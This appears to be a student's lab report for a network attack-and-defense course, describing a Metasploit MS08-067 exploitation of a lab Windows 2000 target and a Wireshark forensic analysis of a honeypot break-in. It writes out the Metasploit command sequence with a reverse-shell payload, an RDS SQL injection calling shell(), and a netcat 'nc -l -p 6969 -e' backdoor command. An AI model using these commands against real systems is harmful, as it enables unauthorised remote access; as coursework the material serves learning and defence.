20252807 2025-2026-2 《网络攻防实践》第6次作业

1.实验内容

(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。当用户在受影响的系统上收到RPC请求时,该漏洞会允许远程执行代码,攻击者可以在未经身份验证情况下利用此漏洞运行任意代码。
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)。
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实践过程

2.1 动手实践Metasploit windows attacker

虚拟机使用情况如下:
kali —— 攻击机 ——(IP)192.168.200.6
Win2kServer—— 靶机 ——(IP)192.168.200.2
·测试连通性:
a6fe473510d013234783377078156f7b
b44c6ddccbdeb7a24fe33e2bc5991d9f
测试结果为互通。
·在kali中输入msfconsole:
c84e0b9cd1c964ce1e563a2167076b2a
·输入命令行search ms08_067查看漏洞ms08_067详细信息:
53a9b29febc363fbd159d241d9ea6daa
·输入use windows/smb/ms08_067_netapi进入漏洞所在文件,然后输入show options查看攻击此漏洞需要的设置:
8b1f7f0497dce39ac7d83bde8915e23a
06e396f08c22c6595dc23e6175ea8a83
·输入命令show payloads显示此漏洞的载荷:
91608f85b10a3fe41c7698da1af9589c
·选择第四个载荷进行攻击:
输入命令set payload generic/shell_reverse_tcp设置载荷、输入命令set RHOST 192.168.200.2设置靶机、输入命令set LHOST 192.168.200.6设置本机:
image
·输入命令exploit进行攻击:
6d9d71f41ca641d1efcec9984d5b00f8
成功利用漏洞进入靶机!
·输入ipconfig/all查看靶机的IP:
55ac5ab6eeb1dbe321eed6bf33816ef8
攻击成功。

2.2 取证分析实践:解码一次成功的NT系统破解攻击

2.2.1 攻击者使用了什么破解工具进行攻击

用wireshark打开snort-0204@0117.log文件,由于攻击方是213.116.251.162,靶机是172.16.1.106,故输入ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106筛选出数据包:
29a21925f6a1659883e0e4d8ce86681c
观察每个数据包,可以看到第117数据包中有%C0%AF,有异常,推测攻击者在利用Unicode攻击访问boot.ini文件:
35d024c1778e4eece97123dba674d943
140数据包中,推测攻击者在获得msadcs.dll文件:8bf0651525750e2a273a944bd2c355f9
在149数据包中也发现了异常:
8c97a96da213a506f6675c9a38a7ee01
分析follow数据,攻击者输入了sql语句:

select from customers where city='|shell("cmd /c echo werd >> c:\fun")|driver={Microsoft Access driver (*.mdb)};dbp=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;

同时出现特殊的字符串:"!ADM!ROX!YOUR!WORLD!"。
分析后推断:攻击者获得系统的访问权限,检测到TCP流中存在/msadc/msadcs.dll访问痕迹,结合漏洞特征可确认攻击源自Metasploit Framework的msadc渗透模块,具体为msadc.pl/msadc2.pl 渗透攻击工具发起的攻击。

2.2.2 攻击者如何使用这个破解工具进入并控制了系统

输入命令ip.addr == 213.116.251.162 && ftp查询ftp包:
2677b856302df8c601e69a52f2553f0b
可以查询到有下载三个文件:nc.exe,pdump.exe,samdump.dll。其中pdump.exe和samdump.dll是配合使用破解口令的,使用samdump.dll拿到口令后再用pdump.exe进行破解,其中SAM文件是通过安全标识进行安全账号管理文件。nc.exe则是一个远程入侵的后门程序,便于下次攻击。

2.2.3 攻击者获得系统访问权限后做了什么

查看1233包:
c718a82072ebc436ba675eb9b6d645bf
分析可得出攻击者执行了c nc -l -p 6969 -e cmd1.exe命令,连接了6969端口,所以输入tcp.port==6969来过滤:
image
查看follow的tcp stream:
a84349469473a5814e2dcb7793812bf5
可以得出,攻击机进入靶机后查看了一些系统文件,然后创建会话写入文件yay.txt。
接下来是要创建了用户组等提升攻击机的访问权限,然后利用磁盘修复工具包中的rdisk工具创建SAM文件副本,然后尝试删除和拷贝SAM文件中的数据,即删除和拷贝har.txt文件,如下图所示:
82542262d025ba9b9095ec5ba21d99ed
a08dfc62b94f731827ea135a28817ca7
75393d7c25cbc464e53ca8c6f827ddf0

2.2.4 我们如何防止这样的攻击

(1)自身的口令设置为强口令,增大破解口令的难度;
(2)定期打补丁,修复漏洞;
(3)定期扫描自身的主机,查看是否存在漏洞等危险。

2.2.5 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么

48f3e24b5d5682e652a971acaea530e0
攻击者发送如上命令,说明警觉了他的目标是一台蜜罐主机。

2.3 团队对抗实践:windows系统远程渗透攻击和分析

设置攻击机为192.168.200.6,靶机为192.168.200.2
输入命令:

msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOST 192.168.200.2
set LHOET 192.168.200.6
exploit

1313711583239935e23fd705e020f32e

mkdir qk
cd qk
echo helloworld:) >>qk.txt

383b61e733404d0a6c34ebf6e9292827
靶机中得到:
2ffe16e9cc77689abdcd580f96af00c3
2ae934d3bb876941ef50c226d50998e6

由于忘记开wireshark捕包,所以我重复操作了一下,查看follow得到的结果如下:
4a2483644c3c043bb6035b60a53ed8aa

3.学习中遇到的问题及解决

取证分析实践:解码一次成功的NT系统破解攻击中,根据实践2视频中的教程学习后学会了如何根据shell进行分析。

4. 实践总结

本次实验深入实践了利用Metasploit框架对目标主机进行渗透测试,通过Metasploitable靶机模拟真实攻击场景。Metasploit作为核心工具,集成了丰富的模块(如针对MS08-067漏洞的利用),提供现成的攻击方法,并明确归类漏洞与操作系统版本的对应关系,极大简化了渗透流程,凸显其作为网络攻防者必备技能的自动化优势。同时,结合Wireshark进行攻击日志分析,成功提取了攻击者使用的工具、漏洞类型和具体手法。最终还学会了团队对抗实践,收获颇丰。

posted @ 2026-04-20 15:12  Aukeeke  阅读(34)  评论(0)    收藏  举报